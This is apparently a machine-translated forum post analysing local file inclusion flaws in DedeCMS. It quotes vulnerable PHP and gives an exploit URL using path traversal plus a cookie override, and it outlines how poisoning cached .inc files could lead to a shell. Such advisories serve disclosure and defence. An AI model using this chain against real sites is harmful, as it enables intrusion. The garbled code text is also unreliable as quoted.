The local inclusion vulnerability still exists in carbuyaction. php.
Is this vulnerability officially fixed?
Check out the latest release package:
Carbuyaction. php
Bottom
Elseif ($ dopost = return) {$ write_list = array (alipay, bank, cod, yeepay); if (in_array ($ code, $ write_list) {require_once DEDEINC. /payment /. $ code .. php; $ pay = new $ code; $ msg = $ pay-> respond (); ShowMsg ($ msg, "javascript:;",); exit ();} else {exit (Error: File Type Can Recognized !); } From the above view, it seems that it has actually been fixed, but open payment/alipay. php to see:
/*** Response operation */function respond () {if (! Empty ($ _ POST) {foreach ($ _ POST as $ key => $ data) {$ _ GET [$ key] = $ data ;}} /* introduce the configuration file */require_once DEDEDATA. /payment /. $ _ GET [code] .. php; // The number of rows is unclear. Oh yes, it still exists...
Someone may ask, isn't the $ code parameter verified? Did you notice $ _ GET [code?
Can the previous $ code be passed in other ways?
Common. inc. php foreach (Array (_ GET, _ POST, _ COOKIE) as $ _ request) {foreach ($ _ request as $ _ k = >$ _ v) $ {$ _ k} = _ RunMagicQuotes ($ _ v);} _ POST _ COOKIE .. Haha...
Continue to use it...
Http://www.xxx.com/plus/carbuyaction.php? Dopost = return & code = ../../
Add code = alipay to the cookie
Another BUG is reported, which can be accessed directly:
Http://www.dedecms.com/plus/carbuyaction.php? Dopost = return & dsql = xx
There is no use price for the moment, and there is a BUG.
In addition, the DedeCmsV5.6 arc. datalist. class. php page contains local files.
The include/arc. datalist. class. php page contains local files.
Code Analysis: include/arc. datalist. class. php
$ Codefile = (isset ($ needCode )? $ NeedCode: $ pai_soft_lang); if (file_exists (DEDEINC. /code/datalist .. $ codefile .. inc) {require_once (DEDEINC. /code/datalist .. $ codefile .. inc);} include this file. inc files,
. Inc is a cached file after the label is interpreted.
In memberalbum_edit.php
$ Dtp-> LoadSource ($ addRow [imgurls]); you can write our data into the cache file. As long as you can post images and add local content, you can use Shell.